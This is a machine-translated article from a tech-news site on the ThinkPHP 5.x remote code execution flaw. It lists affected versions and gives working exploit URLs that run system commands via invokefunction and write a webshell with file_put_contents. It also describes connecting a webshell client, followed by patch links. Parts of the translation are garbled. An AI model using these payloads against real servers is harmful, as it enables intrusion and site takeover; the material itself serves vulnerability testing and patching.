Shulou(Shulou.com)06/03 Report--

This article shows you what ThinkPHP remote code execution vulnerabilities are like. The content is concise and easy to understand. It will definitely make your eyes shine. I hope you can gain something through the detailed introduction of this article.

ThinkPHP is a fast, simple MVC-based and object-oriented lightweight PHP development framework.

A serious remote code execution vulnerability exists in Thinkphp version 5.x. The main reason for this vulnerability is that the framework does not perform sufficient checks on the controller name, which allows malicious statements to be constructed to execute remote commands without enabling forced routing.

scope of influence

Thinkphp 5.1.0 - 5.1.31

Thinkphp 5.0.5 - 5.0.23

exploitability of the vulnerability in relation to

Environment:

thinkphp5.0.22+php5.4.45+ apache2.4.23

1. First set up the corresponding environment, the page access is as follows:

2. When we see that the framework is thinkphp5.x, all we need is to verify if there is a remote code execution vulnerability

http:// localhost/public/index.php? s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

3. After confirming that there is remote code execution here, write to shell

http:// localhost/public/index.php? s =index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../ test.php&vars[1][]=

4. Try to connect with kitchen knife, connection successful

Of course, here we can also choose to upload Malaysia directly

Compared with manual, we can also choose tools directly getshell is OK

Repair suggestions

1. Patching:

Thinkphp v5.0.x patch address:

https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

Thinkphp v5.1.x patch address:

https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

2. Update the framework version

reference link

Exploit Address:

https://www.exploit-db.com/exploits/45978

Framework download address:

http://www.thinkphp.cn/donate/download/id/1125.html

docker vulnerability environment source code:

https://github.com/vulnspy/thinkphp-5.1.29

https://www.gendan5.com

So that's what ThinkPHP remote code execution looks like, and have you learned anything or learned anything? If you want to learn more skills or enrich your knowledge reserves, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.